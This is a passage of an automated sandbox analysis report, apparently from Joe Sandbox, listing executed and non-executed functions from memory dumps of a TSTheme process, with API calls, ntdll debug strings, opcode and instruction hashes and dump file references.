                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: d665bb28e766b405ad5b769d439b243b610f19b16aa710fa6b14fc68fb677987
                                    • Instruction ID: 48e283c90901c9ff534956a0c8646c025856b416138431fbe017a6eac62bc287
                                    • Opcode Fuzzy Hash: d665bb28e766b405ad5b769d439b243b610f19b16aa710fa6b14fc68fb677987
                                    • Instruction Fuzzy Hash: CEE06D762002047BD610EE59DC41F9B73ADEFC9B50F104409FA08A7241D670B9148BB4
                                    Function 02FE8320 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RtlAllocateHeap.NTDLL(02FD1709,?,02FE492B,02FD1709,02FE4697,02FE492B,?,02FD1709,02FE4697,00001000,?,?,02FE9C00), ref: 02FE835F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction ID: 3b7e196fcf7b3c0e756abea6f7a68d5a7d656c09781f68993b3a57da9a63e751
                                    • Opcode Fuzzy Hash: 2cbc616066dca2fff9d95f765f5f3f61b90155f19f2508db422bbec96e683eca
                                    • Instruction Fuzzy Hash: B8E09AB62002097BCA10EE98DC40FEB73ADEFC9750F404409FA08A7241D6B0B9108BB8
                                    Function 02FD7DB0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02FD7DDC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: c9daf9210e734d12ac4972cffec731b4a0f913956132cd96feb1503f1371cb35
                                    • Instruction ID: 187ea8849eed2e99cc161ed3dc7f85ae1b01843a9ba9e348cd15cddc6b424070
                                    • Opcode Fuzzy Hash: c9daf9210e734d12ac4972cffec731b4a0f913956132cd96feb1503f1371cb35
                                    • Instruction Fuzzy Hash: 19E026316402082FFB207AA8DC45F7733498B487A8F2C0668BE5DCF2C1E239F9018550
                                    Function 02FD7BC0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNELBASE(00008003,?,?,02FD19F0,02FE6DB7,02FE4697,?), ref: 02FD7BF3
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorMode
                                    • String ID:
                                    • API String ID: 2340568224-0
                                    • Opcode ID: 266db321dd7d4af4296effd2585e65640b70d0af487c48bf808b05aac7227ce0
                                    • Instruction ID: 2ebd99215571875cffe8e9da873c54d4e51ccbb375902f66d7942d9ecf0fec1f
                                    • Opcode Fuzzy Hash: 266db321dd7d4af4296effd2585e65640b70d0af487c48bf808b05aac7227ce0
                                    • Instruction Fuzzy Hash: 82D05E716802053BF611E6E5CC06F6B328D5B047D8F184078BA0CDB2C2E966F5214DA9
                                    Function 02FD0B5B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostThreadMessageW.USER32(?,00000111), ref: 02FD0B67
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_2fc0000_TSTheme.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: MessagePostThread
                                    • String ID:
                                    • API String ID: 1836367815-0
                                    • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                    • Instruction ID: 2a687eb386f8fbba2f23a956985223de007968dbfd4034580ff57b2a841a102d
                                    • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                    • Instruction Fuzzy Hash: 57D0C967B4111C7AAA125595ACC1EFEB76CEBC5AAAF004067FB08E6140EA6199060AB1
                                    Function 05142C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID:
                                    • API String ID: 2994545307-0
                                    • Opcode ID: 5ea48239423a87f54743bf387756d496164071ea795c198f8f8480ecc0a3c4cc
                                    • Instruction ID: 7375ada1694ce9416e0dead340e3ab7c2df1f8b4c813d52c631f9efd85916ea0
                                    • Opcode Fuzzy Hash: 5ea48239423a87f54743bf387756d496164071ea795c198f8f8480ecc0a3c4cc
                                    • Instruction Fuzzy Hash: 68B09B729015C5D5DA11E7604708B27791177D0711F75C461F2130641E477CC1D1E975

                                    Non-executed Functions

                                    Function 05142890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: e8d3a1d9c71a1fcaabf554d8b00ec520292f6426ddb0f197dc3142a67637ceff
                                    • Instruction ID: d5b527642cdcdf60982581897910226d151ce608a9786a8d3dd7eb4d01d48bec
                                    • Opcode Fuzzy Hash: e8d3a1d9c71a1fcaabf554d8b00ec520292f6426ddb0f197dc3142a67637ceff
                                    • Instruction Fuzzy Hash: E251A5B6A04216BFCB24DF9CC99097EFBB9BB08240F549269F475D7641D374DE808BA0
                                    Function 051B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                    • API String ID: 48624451-2108815105
                                    • Opcode ID: b4a5ca1375a4bb9bdfd7755e095593cd62c6e5d93a7dbc06623161b7da6da449
                                    • Instruction ID: fe84fa8dac265cd51a2423b7d57493fe8e92adfdb8e0b4929c3dcd7fbc786e84
                                    • Opcode Fuzzy Hash: b4a5ca1375a4bb9bdfd7755e095593cd62c6e5d93a7dbc06623161b7da6da449
                                    • Instruction Fuzzy Hash: EF51F679A04645AEEB34DE9CC8909FFB7FAEB48200B048859E5E6C7A41D7F4DE44C760
                                    Function 05137630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                    Download Yara Rule
                                    Strings
                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 05174787
                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05174655
                                    • ExecuteOptions, xrefs: 051746A0
                                    • Execute=1, xrefs: 05174713
                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 051746FC
                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05174725
                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05174742
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                    • API String ID: 0-484625025
                                    • Opcode ID: e6f7b732a43a9094e5328d316bf4a0c00518ec5e6e6ddeb0da829a00f43c1ae1
                                    • Instruction ID: f6ece3d6596688bf8c1142900bcfae8b70698413593aba40f23cc7f228dd3199
                                    • Opcode Fuzzy Hash: e6f7b732a43a9094e5328d316bf4a0c00518ec5e6e6ddeb0da829a00f43c1ae1
                                    • Instruction Fuzzy Hash: 1E51C6B1B042197AEF21EAA4ACAAFBD77A9EB04310F1400A9E505AB1D1DB719B45CF50
                                    Function 0514B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-$0$0
                                    • API String ID: 1302938615-699404926
                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                    • Instruction ID: 3e350fc2c89c5f6920c2cb2949ef8a9bf14dfaa3ce250bc034794579206dd6ad
                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                    • Instruction Fuzzy Hash: D0818E70A0D2499ADF28DF68C891BFEBBA2BF45320F186159D892A72D1C734D841CF54
                                    Function 0512F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                    Download Yara Rule
                                    Strings
                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 051702BD
                                    • RTL: Re-Waiting, xrefs: 0517031E
                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 051702E7
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                    • API String ID: 0-2474120054
                                    • Opcode ID: 83bf1c76056031c28666927a8d88834c60eee1e366b3a8a479af68461b47e684
                                    • Instruction ID: 3a2c17c25fbdd7c779cf4f903123d7aaac463f0315a398cc7bc18734746b4d0a
                                    • Opcode Fuzzy Hash: 83bf1c76056031c28666927a8d88834c60eee1e366b3a8a479af68461b47e684
                                    • Instruction Fuzzy Hash: 6EE1BD316087419FD724CF28C889B2AB7F2FB88724F144A5DF5A68B2D1D774E856CB42
                                    Function 0513BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                    Download Yara Rule
                                    Strings
                                    • RTL: Resource at %p, xrefs: 05177B8E
                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05177B7F
                                    • RTL: Re-Waiting, xrefs: 05177BAC
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 0-871070163
                                    • Opcode ID: 43f74a8d58ab94b97a0bcac4ba75c66dbc8e5f2039b6a38e2ad669b74dd40174
                                    • Instruction ID: 28f68f397be057ecd37fc11c1d4e8855c5741b7bf5a6559d3a565b234da481f0
                                    • Opcode Fuzzy Hash: 43f74a8d58ab94b97a0bcac4ba75c66dbc8e5f2039b6a38e2ad669b74dd40174
                                    • Instruction Fuzzy Hash: 7741E2313097069FC724DE29C851F6AB7E6FF88720F100A2DE95A9B681EB30E4058B91
                                    Function 0513B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0517728C
                                    Strings
                                    • RTL: Resource at %p, xrefs: 051772A3
                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05177294
                                    • RTL: Re-Waiting, xrefs: 051772C1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                    • API String ID: 885266447-605551621
                                    • Opcode ID: 0f65ef2c5dcba8bbc5ea9858a067ded8de3e6e006744f0ce98533d54c4790465
                                    • Instruction ID: 83f9c0e4c95007b11cbbeeb9236530971de9de130ee5f0b533bb8cddfd78e025
                                    • Opcode Fuzzy Hash: 0f65ef2c5dcba8bbc5ea9858a067ded8de3e6e006744f0ce98533d54c4790465
                                    • Instruction Fuzzy Hash: 2041F531708206ABC725DE29CC45F6AB7B6FF44710F100A19F966EB280EB31E856CBD1
                                    Function 051B2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: ___swprintf_l
                                    • String ID: %%%u$]:%u
                                    • API String ID: 48624451-3050659472
                                    • Opcode ID: 3ca2cf1a2b50daa1fedc2e71b679cae8b21c082e891fa36e51e972bf7c8bafe4
                                    • Instruction ID: c449fcaa391eb9c211b9c614fc6b0e7a4fef0a3ae3c520679a904f7fc0b77587
                                    • Opcode Fuzzy Hash: 3ca2cf1a2b50daa1fedc2e71b679cae8b21c082e891fa36e51e972bf7c8bafe4
                                    • Instruction Fuzzy Hash: 84318676A002199FDB20DF29DC44FEEB7B8FB48610F440555E859E3240EB709A498FA0
                                    Function 05147D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID: __aulldvrm
                                    • String ID: +$-
                                    • API String ID: 1302938615-2137968064
                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                    • Instruction ID: 660b9687734a44c518c26c5f2d5c95e86550e645338c26a1c83bf47a71eff021
                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                    • Instruction Fuzzy Hash: CB91B870E042159FDF24DF69C890ABEB7A6FF44720F54661AE865E72C0D73499838F50
                                    Function 05109126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3663554386.00000000050D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 050D0000, based on PE: true
                                    • Associated: 0000000F.00000002.3663554386.00000000051F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.00000000051FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 0000000F.00000002.3663554386.000000000526E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_50d0000_TSTheme.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $$@
                                    • API String ID: 0-1194432280
                                    • Opcode ID: 35e748af9864ed91e9dd435fb5e172cfc13e5171754d05b586b612fa1bb3cd7a
                                    • Instruction ID: 99ac2f464ccaa6b565ac5e2cfbdcc202a788d0568bfa1245b4c5f61f4158f4e9
                                    • Opcode Fuzzy Hash: 35e748af9864ed91e9dd435fb5e172cfc13e5171754d05b586b612fa1bb3cd7a
                                    • Instruction Fuzzy Hash: CB814B75E012699BDB35DB54CC44BEEB7B5AF08750F0041EAE91AB7281D7709E84CFA0